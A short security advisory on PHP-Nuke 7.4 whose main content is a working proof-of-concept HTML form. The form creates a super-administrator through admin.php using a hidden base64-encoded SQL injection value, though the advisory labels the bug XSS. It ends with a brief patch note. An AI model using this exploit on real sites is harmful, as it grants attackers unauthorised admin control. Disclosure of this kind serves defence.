**************************************************************

* CODEBUG Labs

* Advisory #1

* Title: AddAdmin Bug

* Author: Pierquinto 'Mantra' Manco

* Product: PHP-Nuke 7.4

* Type: XSS

* Web: http://www.mantralab.org [ITALIAN SITE]

*

**************************************************************

Remote Privilege Escalation

- ) Description

PHP-Nuke is a very bugged web CMS, version 7.4 has critical

XSS bug that permit to an attacker to gain Admin access

to the system.

The bug is very old but we can bypass the patch sending data

by POST instead of GET.

- ) Proof-of-Concept

Create a HTML file with this lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">

<p>USERNAME:

<input type="text" name="add_aid">

<br>

NOME:

<input type="text" name="add_name">

<br>

PASSWORD:

<input type="text" name="add_pwd">

<br>

E-MAIL:

<input type="text" name="add_email">

<br>

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">

<br>

<input type="hidden" name="add_radminsuper" value="1">

<br>

<input type="hidden" name="op" value="AddAuthor">

</p>

<p>

<input type="submit" name="Submit" value="Create Admin">

<br>

</p>

</form>

- ) Patch

Put in admin.php a routine to check GET and POST global array.

(maybe COOKIE too)

**************************************************************

http://www.mantralab.org

admin (at) mantralab (dot) org [email concealed]

**************************************************************

[ reply ]